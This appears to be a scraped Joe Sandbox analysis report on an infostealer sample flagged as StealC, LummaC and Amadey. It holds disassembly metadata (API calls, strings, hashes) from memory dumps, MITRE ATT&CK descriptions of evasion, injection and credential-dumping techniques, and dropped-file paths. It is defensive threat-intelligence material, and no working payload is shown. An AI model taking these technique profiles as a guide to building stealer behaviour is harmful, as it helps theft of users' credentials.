free.MOZGLUE(?), ref: 6C68CC87

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 0865be4703c481558183fa4001e8402426ac521b63b7ca4b4659028e0516427b
Instruction ID: 5f37c878d72f99b54f12decacdfd3ac79ff12fc251ba329e747c93047b7915aa
Opcode Fuzzy Hash: 0865be4703c481558183fa4001e8402426ac521b63b7ca4b4659028e0516427b
Instruction Fuzzy Hash: 6DE06576700609AFCB10EFA9DC88C8777BCEE492707150525E692C3700D232F905CBE5

Function 6C569DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C569E1F

Part of subcall function 6C5213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C4F2352,?,00000000,?,?), ref: 6C521413
Part of subcall function 6C5213C0: memcpy.VCRUNTIME140(00000000,R#Ol,00000002,?,?,?,?,6C4F2352,?,00000000,?,?), ref: 6C5214C0

Strings

LIKE or GLOB pattern too complex, xrefs: 6C56A006
ESCAPE expression must be a single character, xrefs: 6C569F78

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 7f427daab59b0424938baf95b84804509aef139a3bfe47713da96be8a4e7ffbb
Instruction ID: fa0a3bfa46a6a38af9b0fb4de4772b114fd1146611e8c347cafadce2b9fb4b3a
Opcode Fuzzy Hash: 7f427daab59b0424938baf95b84804509aef139a3bfe47713da96be8a4e7ffbb
Instruction Fuzzy Hash: 6E811D71A042558BD701CF26C8803AAF7F2AF85318F29C659D8A48BFA5D736DC86C791

Function 6C5C4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5C4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C5C4DE6

Strings

%d.%d, xrefs: 6C5C4DDE

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 4baaf844ae644a34b88ce5c664fcc8ea621d3f81aba58a9ad446e3410fa0f265
Instruction ID: 3a219937cfb1803cb0449b130c3981e6081c8df890509e4e5de21955439572fb
Opcode Fuzzy Hash: 4baaf844ae644a34b88ce5c664fcc8ea621d3f81aba58a9ad446e3410fa0f265
Instruction Fuzzy Hash: 2F31C7B2E042596BEB10ABE19C41FFF7768EF81308F05046DED159B681EB309D05CBA6

Function 6C5E4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8^l,00000000,00000000,?,?,6C5E3827,?,00000000), ref: 6C5E4D0A

Part of subcall function 6C5D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C5E4D22

Part of subcall function 6C5CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C571A3E,00000048,00000054), ref: 6C5CFD56

Strings

'8^l, xrefs: 6C5E4D07

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8^l
API String ID: 1521942269-1457889562
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 050db37d25971731e164aa65d1164fceb8373bee172e4eb2330f170c925d1dd5
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 90F06D32601234A7EB504DEAAE80B8736DC9B496BDF150271ED28CFB81E721DC0486A2

Function 6C60AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C60AF78

Part of subcall function 6C56ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C56ACE2
Part of subcall function 6C56ACC0: malloc.MOZGLUE(00000001), ref: 6C56ACEC
Part of subcall function 6C56ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C56AD02
Part of subcall function 6C56ACC0: TlsGetValue.KERNEL32 ref: 6C56AD3C
Part of subcall function 6C56ACC0: calloc.MOZGLUE(00000001,?), ref: 6C56AD8C
Part of subcall function 6C56ACC0: PR_Unlock.NSS3 ref: 6C56ADC0
Part of subcall function 6C56ACC0: PR_Unlock.NSS3 ref: 6C56AE8C
Part of subcall function 6C56ACC0: free.MOZGLUE(?), ref: 6C56AEAB

memcpy.VCRUNTIME140(6C6D3084,6C6D02AC,00000090), ref: 6C60AF94

Strings

SSL, xrefs: 6C60AF73

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 8bb02df55a611a0ba823f289208805eba05f8582ede5b03311da7374ae90e20a
Instruction ID: 7870b84b2392abf81d3c398a68210e1ea60fc0c5fefb38c7d0b2cdcb817dddb9
Opcode Fuzzy Hash: 8bb02df55a611a0ba823f289208805eba05f8582ede5b03311da7374ae90e20a
Instruction Fuzzy Hash: 1B2156B2305A44AEDB08DF53A6837127B70B782704F509138C1166BF29D73165449FEE

Function 6C560F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F1B

Part of subcall function 6C561370: GetSystemInfo.KERNEL32(?,?,?,?,6C560936,?,6C560F20,6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000), ref: 6C56138F

PR_NewLogModule.NSS3(clock,6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F25

Part of subcall function 6C561110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C560936,00000001,00000040), ref: 6C561130
Part of subcall function 6C561110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C560936,00000001,00000040), ref: 6C561142
Part of subcall function 6C561110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C560936,00000001), ref: 6C561167

Strings

clock, xrefs: 6C560F20

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 954a46732e45e979778256c3716ff8349bc556726f69a968f0aa737c2827a137
Instruction ID: e62ee39609b6de52315bba6eda038e1f601af3677ef2a138b0500d3f97f22de8
Opcode Fuzzy Hash: 954a46732e45e979778256c3716ff8349bc556726f69a968f0aa737c2827a137
Instruction Fuzzy Hash: BFD02231A00104A2C60022979C85BB7B3ACC7C32B9F000822E00982D204A356CEBC66D

Function 6C5D0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C5D0DF5
TlsGetValue.KERNEL32 ref: 6C5D0E2D
TlsGetValue.KERNEL32 ref: 6C5D0E58
TlsGetValue.KERNEL32 ref: 6C5D0E84

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: fef6bb3b19443b50015812d1382a6ee6fe07eace38f4efd4353e69b38838ef68
Instruction ID: 578bff7a8937df4d8caad69d01d4582bff79d6710800c6cbce2686f7cd1ab94b
Opcode Fuzzy Hash: fef6bb3b19443b50015812d1382a6ee6fe07eace38f4efd4353e69b38838ef68
Instruction Fuzzy Hash: D931A770645396CBDB00AF3ECD8565977B4FF86308F02496FD88587A21DB34E485CB89

Function 6C5D0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C572AF5,?,?,?,?,?,6C570A1B,00000000), ref: 6C5D0F1A
malloc.MOZGLUE(00000001), ref: 6C5D0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5D0F42
TlsGetValue.KERNEL32 ref: 6C5D0F5B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 123a62ac32de86a192a3b028221b5450e1e297a43d249dfe0f9704c5e8d64763
Instruction ID: 35eb1d53c431b01892f16802fcb69b2674dcb5fd9cb9e96d636dbca03c26a952
Opcode Fuzzy Hash: 123a62ac32de86a192a3b028221b5450e1e297a43d249dfe0f9704c5e8d64763
Instruction Fuzzy Hash: 4B0128B1E013919BEB10673F9D445667AACEFD2258F120523EC09C2A21EB30E805C2EF

Function 6C581EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C581ECE
free.MOZGLUE(?), ref: 6C581EDF
free.MOZGLUE(?), ref: 6C581EEF
free.MOZGLUE(?), ref: 6C581EF5

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 69b6117c939a3c4911bcc2ba44ff282673f0d9cf3e0492ede8f885a19016f5b2
Instruction ID: b0dc1db99b937e606ff0885fc1975f4e53bd4973d772fc6421dcc6686965f750
Opcode Fuzzy Hash: 69b6117c939a3c4911bcc2ba44ff282673f0d9cf3e0492ede8f885a19016f5b2
Instruction Fuzzy Hash: B4F0BEB17012116BEB00EBAADC89E2777ACEF452A4B040424EC2AC3A00E726F51187B6

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGDHDAFIDGDBGCAAFIDHIJKEHD

C:\ProgramData\BGHJEBKJEGHJKECAAKJKEGIIEG

C:\ProgramData\FIJJKECFCFBGDHIECAAF

C:\ProgramData\JEBKKEGD

C:\ProgramData\JJJDGIECFCAKKFHIIIJE

C:\ProgramData\JKKKJJJK

C:\ProgramData\JKKKJJJKJKFHJJJJECBF

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
